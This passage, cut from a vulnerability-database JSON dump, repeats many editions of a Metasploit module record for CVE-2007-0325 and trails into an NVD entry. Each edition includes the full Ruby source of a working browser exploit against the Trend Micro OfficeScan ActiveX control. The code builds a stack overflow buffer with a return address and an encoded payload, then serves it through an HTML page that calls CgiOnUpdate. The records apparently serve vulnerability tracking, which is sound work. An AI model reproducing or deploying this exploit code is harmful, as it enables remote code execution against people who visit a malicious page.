=>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-02-01T14:10:20", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-02-02T18:14:12", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "modified": "2018-02-02T18:14:12"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-02-02T18:14:12", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-02-03T02:08:13", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "modified": "2018-02-03T02:08:13"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-02-03T02:08:13", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-02-26T19:04:48", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "modified": "2018-02-26T19:04:48"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-02-26T19:04:48", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-02-26T21:07:38", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-02-26T21:07:38", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-08-28T23:40:44", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-08-28T23:40:44", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "b4243b7b328c997897fc12de44250db5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-08-29T01:44:14", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-08-29T01:44:14", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "f103e24f3c2222b6bf9844bde3b50afc", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-10-26T19:53:21", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-10-26T19:53:21", "differentElements": ["modified", "published"], "edition": 24}], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}

{"cve": [{"lastseen": "2016-09-03T08:17:47", "references": ["http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034288", "http://www.securitytracker.com/id?1017664", "http://www.kb.cert.org/vuls/id/784369", "http://www.securityfocus.com/bid/22585", "http://www.vupen.com/english/advisories/2007/0638", "http://www.trendmicro.com/ftp/documentation/readme/osce_70_win_en_securitypatch_1344_readme.txt"], "description": "Multiple buffer overflows in the Trend Micro OfficeScan Web-Deployment SetupINICtrl ActiveX control in OfficeScanSetupINI.dll, as used in OfficeScan 7.0 before Build 1344, OfficeScan 7.3 before Build 1241, and Client / Server / Messaging Security 3.0 before Build 1197, allow remote attackers to execute arbitrary code via a crafted HTML document.", "edition": 1, "reporter": "NVD", "published": "2007-02-20T12:28:00", "title": "CVE-2007-0325", "type": "cve", "enchantments": {"score": {"modified": "2016-09-03T08:17:47", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-0325"], "scanner": [], "cpe": ["cpe:/a:trend_micro:officescan_corporate_edition:7.0", "cpe:/a:trend_micro:client-server-messaging_security:3.0", "cpe:/a:trend_micro:officescan_corporate_edition:7.3"], "modified": "2011-03-07T21:49:16", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0325", "id": "CVE-2007-0325", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", 